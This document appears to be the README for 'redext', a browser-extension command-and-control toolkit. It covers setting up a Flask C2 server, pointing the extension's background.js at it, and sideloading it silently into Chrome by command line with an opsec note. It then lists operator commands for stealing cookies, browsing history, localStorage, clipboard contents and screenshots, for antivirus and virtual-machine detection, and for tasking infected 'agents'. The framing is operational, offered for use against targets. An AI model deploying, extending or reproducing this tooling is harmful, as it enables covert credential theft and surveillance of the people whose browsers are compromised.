Prerequisites

System Requirements:

  • Python 3.8 or higher
  • Chrome/Chromium-based browser
  • Git (for installation)
  • SQLite3

Python Dependencies:

Flask==2.2.5
Flask-Cors==3.1.1
click==8.1.3

Server Installation

1. Clone the Repository

git clone https://github.com/your-repo/redext.git
cd redext/server

2. Create Virtual Environment

python -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate

3. Install Dependencies

pip install -r requirements.txt

4. Initialize Database

python db_setup.py

5. Start the Server

python c2_server.py

Note: Command-line installation requires appropriate system permissions and may trigger security alerts.

Extension Installation

1. Configure Extension

Edit the C2 server address in background.js:

// background.js
const C2_SERVER = 'http://your-server-address:5000';

2. Load in Chrome

  1. Open Chrome and navigate to chrome://extensions
  2. Enable "Developer mode" in the top right
  3. Click "Load unpacked" and select the ext directory

3. Command-Line Installation

For automated deployment via command line:

# Windows (PowerShell)
$ExtPath = "C:\path\to\redext\ext"
Start-Process "chrome.exe" -ArgumentList "--load-extension=$ExtPath --no-first-run --no-default-browser-check"

# Linux
google-chrome --load-extension=/path/to/redext/ext --no-first-run --no-default-browser-check

# macOS
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --load-extension="/path/to/redext/ext" --no-first-run

The extension requires extensive permissions for its operation. consider that (opsec).

Available Commands

Browser Data Collection

Cookie Extraction

Command: GETCOOKIES
Payload: {"domain": "optional-domain"}

History Collection

Command: HISTORY
Payload: {"days": 7}

Bookmark Export

Command: BOOKMARKS
Payload: {}

LocalStorage Dump

Command: LOCALSTORAGEDUMP
Payload: {}

Visual Intelligence

Screenshot Capture

Command: TAKE_SCREENSHOT
Payload: {"quality": 50}

DOM Snapshot

Command: DOMSNAPSHOT
Payload: {}

Monitoring Features

Clipboard Monitoring

Command: CLIPBOARDCAPTURE
Payload: {}

System Enumeration

Command: ENUMERATION
Payload: {}

System Enumeration

Overview

Collects comprehensive system information including hardware specifications, browser capabilities, and security features.

Command Structure

{
    "command": "ENUMERATION",
    "parameters": {}
}

// Example Response
{
    "browser": {
        "userAgent": "...",
        "platform": "...",
        "hardwareConcurrency": "8"
    },
    "hardware": {
        "gpu": "...",
        "memory": "..."
    },
    "security": {
        "virtualMachine": false,
        "antivirusHints": []
    },
    "extensions": [
        {"name": "...", "version": "..."}
    ]
}

Collected Information

  • • Browser specifications and capabilities
  • • Hardware configuration and resources
  • • Installed extensions and versions
  • • Security software presence
  • • Virtual machine detection results

Server Management

Dashboard Access

Access the C2 dashboard at:

http://your-server-address:5000

Available Routes

  • / - Overview and statistics
  • /agents - Connected agents management
  • /tasks - Task creation and monitoring
  • /data - Collected data visualization

Task Management

Create new tasks through the dashboard:

POST /create_task
{
    "agent_id": "target-agent-id",
    "command": "COMMAND_NAME",
    "parameters": {},
    "description": "Task description"
}